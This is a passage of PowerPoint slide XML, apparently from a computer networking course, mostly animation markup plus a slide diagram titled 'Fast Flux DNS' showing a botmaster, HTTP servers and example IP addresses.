                                          <p:spTgt spid="90"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55"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left)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="61" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="with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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="64" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="with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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="67" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="70" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="71" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="92"/>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93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>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94"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>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95"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="95"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="95"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="95"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="91" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="92" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="5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3074"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>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86"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>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7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>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88"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>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91"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="113" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>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89"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>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90"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>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83"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>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84"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>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85"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="85"/>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22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="135" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="96"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="96"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="137" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="138" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="141" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="142" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="145" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="146" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="147" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="148" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="109"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="149" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="150" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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0596"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fast Flux DNS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8857865" y="2957909"/>
            <a:ext cx="1376875" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTP Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549945" y="1783247"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5336268" y="2503710"/>
            <a:ext cx="715963" cy="7837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19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052230" y="2503710"/>
            <a:ext cx="647358" cy="7837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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1972478" y="5184652"/>
            <a:ext cx="4254253" cy="10284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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3808536" y="5184652"/>
            <a:ext cx="2418195" cy="10284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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4732174" y="5184653"/>
            <a:ext cx="1494557" cy="94135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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5681612" y="5184652"/>
            <a:ext cx="545119" cy="9222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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226731" y="5184652"/>
            <a:ext cx="315131" cy="10284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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226731" y="5184653"/>
            <a:ext cx="1259529" cy="9222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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226730" y="5184653"/>
            <a:ext cx="2177558" cy="9222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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226731" y="5184653"/>
            <a:ext cx="3095587" cy="9222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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226731" y="5184652"/>
            <a:ext cx="4013619" cy="8786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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2890506" y="5184652"/>
            <a:ext cx="3336225" cy="102847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9" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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524450"/>
            <a:ext cx="979261" cy="9792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D:\Classes\CS 4700\assets\ser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208" y="2928934"/>
            <a:ext cx="881062" cy="8810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2180"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209"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238"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6267"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296"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2325"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0354"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8383"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6415"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4151"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 descr="D:\Classes\CS 4700\assets\ser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6178" y="2928934"/>
            <a:ext cx="881062" cy="881062"/>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Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052230" y="2503711"/>
            <a:ext cx="2346448" cy="6749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19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3808534" y="2503711"/>
            <a:ext cx="2243697" cy="8657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19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2280800" y="2503711"/>
            <a:ext cx="3771431" cy="86575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6" name="Picture 3" descr="D:\Classes\CS 4700\assets\ser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238" y="2928934"/>
            <a:ext cx="881062" cy="88106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descr="D:\Classes\CS 4700\assets\ser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268" y="2928934"/>
            <a:ext cx="881062" cy="88106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 descr="D:\Classes\CS 4700\assets\ser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8148" y="2928934"/>
            <a:ext cx="881062" cy="881062"/>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a:off x="1578330" y="3766597"/>
            <a:ext cx="1293944" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>12.34.56.78</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="TextBox 75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368003" y="3766597"/>
            <a:ext cx="825867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6.4.2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="TextBox 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4655528" y="3766597"/>
            <a:ext cx="1176925" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>31.64.7.22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="TextBox 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375910" y="3766597"/>
            <a:ext cx="1176925" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>245.9.1.43</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="TextBox 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7931949" y="3766597"/>
